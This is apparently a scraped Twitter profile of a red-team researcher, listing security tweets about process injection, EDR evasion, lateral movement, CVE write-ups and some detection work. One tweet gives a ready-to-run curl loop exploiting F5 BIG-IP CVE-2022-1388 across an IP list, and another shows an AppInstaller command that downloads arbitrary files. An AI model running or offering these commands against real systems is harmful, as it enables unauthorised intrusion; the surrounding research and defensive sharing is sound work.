Lynn Enayeh @m3m0ryAll0c
#RedTeam @ Mandiant | ☕️👩🏽💻🚴🏽♀️🏋🏽♀️✈️. Washington, DC. Joined May 2017
Tweets: 120 | Followers: 271 | Following: 145 | Likes: 1K
As "offensive operators" we often have way more data than is typically presented. It's time to do better than lazy screenshots of a Bloodhound UI with a messy blob. Given transitive object control: give info on last hop, chain length, and type. IN FULL! tinyurl.com/44y4up7k
A small blogpost (and PoC) about creating Windows processes using syscalls 😊 coresecurity.com/core-labs/arti…
Lateral movement with Outlook + WMI COM objects
[BLOG] Short post on how to use Firefox to access internal web apps over SOCKS using NTLM authentication. offensivedefence.co.uk/posts/ntlm-aut…
Here is my variant of Gargoyle for x64 to evade memory scanners. Fully relies on ROP and PIC without any APC. Huge thanks to @waldoirc for the documentation. github.com/thefLink/DeepS…
[BLOG POST] Finally managed to write down a post about FunctionHijacking, a "new" process injection technique built upon Module/Function Stomping, along with my experiments to break behavioral based detection of other common process injection techniques. klezvirus.github.io/RedTeaming/AV_…
The first blog post is here. This one covers the technical details of CVE-2022-26923 (Active Directory Domain Services Elevation of Privilege Vulnerability). The vulnerability was patched as part of the May 2022 Security Updates from Microsoft. research.ifcr.dk/9e098fe298f4
Exploit F5 Big IP Using Curl CVE-2022-1388 cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done did i miss something ? #bugbountytip #bugbonty #infosec
New from @jsecurity101: MSRPC to ATT&CK is an encyclopedia of comprehensive context about specific Remote Procedure Call protocols. redcanary.com/blog/msrpc-to-…
PE/COFF import parser (github.com/EspressoCake/D…) + DLL search order hijacking BOF 👏🏽👏🏽
So now we are in 2021 and everyone is using LAPS (cough cough), it is time for CrackMapExec to level up the game. I've added a new core function "--laps", so if you have compromised an account that can read LAPS pass, you can conquer the world now 🔥 Pushed on @porchetta_ind 🪂
As some of you may know, #CobaltStrike beacons can be detected using ETW. For CCDC our team built and used BeaconHunter to detect and respond to these threats. Github: github.com/3lp4tr0n/Beaco… We were able to kill +210 beacons (~70% automated) and monitor their behavior like...
A tale of EDR bypass methods - s3cur3th1ssh1t.github.io/A-tale-of-EDR-… Special thanks to @_EthicalChaos_ and @_RastaMouse for answering all my questions! 🍻
We've summarized 4 primary techniques we've seen #UNC2452 and other TAs use while moving laterally to the M365 cloud. Technical details, detect, prevent, and recovery advice: fireeye.com/blog/threat-re… shouts to co-authors Matthew McWhirt, Nick Bennet, and @mburns7
1⃣ Search SolarWinds server for SolarWinds.Orion.Core.BusinessLayer.dll (may be multiple) 2⃣ Copy any/all to a temp folder 3⃣ Scan with Yara rules (Or just scan the whole server..) 4⃣ If a match, review the blog post and move to IR Take this threat very seriously. #SUNBURST 🎆
I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source=<url> `start` calls the default URI handler, spawns AppInstaller.exe, and downloads an arbitrary file which you can find using forfiles. #lolbin #lolbas #appinstaller
Our lab rats have been busy! 🔥🐀 In our latest post, @Jean_Maes_1994 explains how D/Invoke can be used to bypass hooking. Shoutout to @cobbr_io for the Sharpsploit project, @FuzzySec and @TheRealWover for their work on D/Invoke blog.nviso.eu/2020/11/20/dyn…
